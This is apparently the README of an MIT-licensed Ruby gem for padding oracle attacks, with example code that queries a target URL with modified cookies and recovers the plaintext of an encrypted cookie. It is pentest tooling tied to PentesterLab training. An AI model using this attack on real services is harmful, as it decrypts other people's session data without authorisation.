This is a Rubyframework for exploiting padding oracle vulnerabilities based on this fantastic Python project:
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You will first need to extend the module with your own padding_oracle function. Example:
require 'httparty'
require 'base64'
require 'uri'
URL = ''
module Paddingoracle
def decrypt_oracle(string)
string = URI.escape(Base64.strict_encode64(string))
response = HTTParty.get(URL, cookies: {auth: string})
raise "Invalid padding" if response.code != 200
You can then run the attack like this;
Blocksize = 8
COOKIE = 'vulnerable encrypted data'
bcookie = Base64.decode64(COOKIE)
plain = Paddingoracle::recover_all_blocks(bcookie, Blocksize)
puts plain
This product was written to solve a specific problem - I'm happy to investigate bugs but this type of codebase is not suited to new features or "how to use" requests.
If you are interested in this tool, we highly recommend the training at PentesterLab, which includes a vulnerable service relevant to this tool.
The gem is available as open source under the terms of the MIT License.